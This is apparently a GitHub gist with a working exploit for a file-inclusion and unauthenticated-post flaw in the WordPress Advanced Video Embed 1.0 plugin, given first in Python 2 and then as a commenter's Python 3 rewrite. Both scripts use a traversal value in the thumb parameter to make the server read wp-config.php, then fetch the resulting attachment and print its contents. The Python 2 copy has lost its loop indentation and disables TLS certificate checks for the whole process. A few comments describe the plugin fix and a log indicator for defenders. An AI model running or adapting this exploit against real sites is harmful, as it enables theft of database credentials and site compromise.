@kongwenbin
Last active March 3, 2024 21:21
Modified exploit for WordPress Plugin Advanced Video 1.0 - Local File Inclusion - fixed the SSL issue
#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
# Timeline
# 03/24/2016 - Bug discovered
# 03/24/2016 - Initial notification of vendor
# 04/01/2016 - No answer from vendor, public release of bug
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
# function ave_publishPost(){
# $title = $_REQUEST['title'];
# $term = $_REQUEST['term'];
# $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
# $image_data = file_get_contents($thumb);
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
import random
import urllib2
import re
import ssl
# Process-wide: every HTTPS request made by this interpreter now accepts any certificate (no TLS verification).
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.117.136:12380/blogblog/" # insert url to wordpress
# Random post title; its digits are what the response parsing below looks for.
randomID = long(random.random() * 100000000000000000L)
# Request 1: the ave_publishPost AJAX action, reached through admin-ajax.php, takes a caller-supplied
# `thumb` value. As quoted in the header (class.avePost.php lines 57/78), $_REQUEST['thumb'] goes
# straight into file_get_contents(), and no capability or nonce check is visible in that snippet.
# Defender note: the plugin-side fix is to reject non-URL / traversal values for `thumb` and to gate
# the action behind a nonce + capability check; in web logs the indicator is an admin-ajax.php request
# with action=ave_publishPost whose thumb parameter carries a filesystem path.
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
# NOTE(review): the indentation of the two loops below appears to have been lost in this paste;
# the Python 3 rewrite further down shows the intended loop bodies.
for line in content:
numbers = re.findall(r'\d+',line)
id = numbers[-1]  # last run of digits on the line; `id` shadows the builtin. Raises IndexError on a line with no digits.
id = int(id) / 10  # presumably turns the echoed value into the post ID — why /10 is not shown on this page; Python 2 integer division
# Request 2: fetch the newly created post and pull the post-thumbnail <img> URL out of the matching line.
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
urls=re.findall('"(https?://.*?)"', line)  # first quoted http(s) URL on the line is taken as the attachment
print urllib2.urlopen(urls[0]).read()  # the attachment body is the file the server read in request 1
@daVinci13

Python 3 rewrite

import random
import requests
import re

url = "https://192.168.117.136:12380/blogblog/"  # Insert the URL to your WordPress site

# Random post title; its digits are what the response parsing below looks for.
randomID = int(random.random() * 100000000000000000)

# Request 1: the ave_publishPost AJAX action takes a caller-supplied `thumb` value which, per the
# quoted plugin code (class.avePost.php line 78), is passed unvalidated to file_get_contents(), and
# no capability or nonce check is visible in that snippet.
# Defender note: the plugin-side fix is to reject non-URL / traversal values for `thumb` and to gate
# the action behind a nonce + capability check; in web logs the indicator is an admin-ajax.php request
# with action=ave_publishPost whose thumb parameter carries a filesystem path.
response1 = requests.get(f"{url}/wp-admin/admin-ajax.php?action=ave_publishPost&title={randomID}&short=rnd&term=rnd&thumb=../wp-config.php")
content1 = response1.text.splitlines()

# Only the value from the last iterated line survives the loop; `id` shadows the builtin, and
# numbers[-1] raises IndexError on a line with no digits.
for line in content1:
    numbers = re.findall(r'\d+', line)
    id = numbers[-1]
    id = int(id) // 10  # presumably recovers the post ID from the echoed value — why //10 is not shown on this page

# Request 2: fetch the newly created post and pull the post-thumbnail <img> URL out of the matching line.
response2 = requests.get(f"{url}/?p={id}")
content2 = response2.text.splitlines()

for line in content2:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)  # first quoted http(s) URL on the line is taken as the attachment
        image_content = requests.get(urls[0]).content  # the attachment body is the file the server read in request 1
        print(image_content.decode('utf-8'))  # assumes the fetched bytes are valid UTF-8; raises UnicodeDecodeError otherwise
